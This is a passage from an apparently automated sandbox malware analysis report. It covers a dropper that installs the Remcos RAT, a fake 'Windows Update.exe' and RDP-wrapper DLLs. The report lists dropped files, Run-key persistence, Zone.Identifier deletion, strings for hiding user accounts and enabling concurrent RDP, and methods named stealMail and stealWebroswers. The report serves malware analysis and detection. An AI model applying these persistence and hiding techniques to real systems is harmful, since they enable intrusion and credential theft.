                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB2E85 push ecx; ret 1_2_6EDB2E98
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC6D57 push esp; retf 1_2_6EDC6D59
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00452248 push eax; ret 4_2_00452266
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004308E6 push ecx; ret 4_2_004308F9
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00451926 push ecx; ret 4_2_00451939
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
                    Source: sqlite3.dll.39.drStatic PE information: section name: /4
                    Source: sqlite3.dll.39.drStatic PE information: section name: /19
                    Source: sqlite3.dll.39.drStatic PE information: section name: /35
                    Source: sqlite3.dll.39.drStatic PE information: section name: /51
                    Source: sqlite3.dll.39.drStatic PE information: section name: /63
                    Source: sqlite3.dll.39.drStatic PE information: section name: /77
                    Source: sqlite3.dll.39.drStatic PE information: section name: /89
                    Source: sqlite3.dll.39.drStatic PE information: section name: /102
                    Source: sqlite3.dll.39.drStatic PE information: section name: /113
                    Source: sqlite3.dll.39.drStatic PE information: section name: /124
                    Source: rem9090sta.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x7e1fd
                    Source: WindowsUpdate.exe.44.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: remcos.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x7e1fd
                    Source: xxTzyGLZx5.exeStatic PE information: real checksum: 0x0 should be: 0xd6064
                    Source: bin.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x1f2c5
                    Source: sozz.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x28e4f
                    Source: sqlmap.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x28987
                    Source: 4.exe.35.drStatic PE information: real checksum: 0x0 should be: 0x91963
                    Source: dwn.exe.13.drStatic PE information: real checksum: 0xa45b should be: 0x249c41
                    Source: Droppertodownloa[1].exe.13.drStatic PE information: real checksum: 0xa45b should be: 0x249c41
                    Source: kqkz.dll.38.drStatic PE information: real checksum: 0x0 should be: 0x308b5
                    Source: rgsbzeog.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x32e49
                    Source: rgsbzeog.dll.37.drStatic PE information: real checksum: 0x0 should be: 0x32e49
                    Source: Windows Update.exe.40.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: 5.exe.35.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: 21.exe.35.drStatic PE information: real checksum: 0x0 should be: 0xea499
                    Source: orwglwkinzb.dll.36.drStatic PE information: real checksum: 0x0 should be: 0x2d55f

                    Persistence and Installation Behavior:

                    barindex
                    Uses cmd line tools excessively to alter registry or file dataShow sources
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\bin.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\4.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile created: C:\Users\user\AppData\Roaming\Remcos\dwn.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG77.tmp (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile created: C:\Users\user\AppData\Local\Temp\nsuAEE7.tmp\kqkz.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\5.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Local\Temp\nst9F76.tmp\orwglwkinzb.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\21.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Local\Temp\nsaAFFF.tmp\rgsbzeog.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeFile created: C:\Users\user\AppData\Roaming\Remcos\remcos.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile created: C:\Users\user\AppData\Local\Temp\nslA5A0.tmp\rgsbzeog.dllJump to dropped file
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\rem9090sta.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00405E28 ShellExecuteW,URLDownloadToFileW,4_2_00405E28

                    Boot Survival:

                    barindex
                    Creates multiple autostart registry keysShow sources
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run logsmustcomeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run itswell
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
                    Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run logsmustcomeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run logsmustcomeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run itswell
                    Source: C:\Users\user\AppData\Local\Temp\4.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run itswell
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00416D71 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00416D71

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile opened: C:\Users\user\AppData\Local\Temp\bin.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Contains functionality to hide user accountsShow sources
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: xxTzyGLZx5.exe, 00000002.00000003.680946266.0000000000805000.00000004.00000001.sdmpString found in binary or memory: ! UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType9 "@
                    Source: xxTzyGLZx5.exe, 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmpString found in binary or memory: ! UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType9 "@
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: xxTzyGLZx5.exe, 00000002.00000003.682059201.00000000007CD000.00000004.00000001.sdmpString found in binary or memory: ! UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType9 "@
                    Source: bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                    Source: bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic 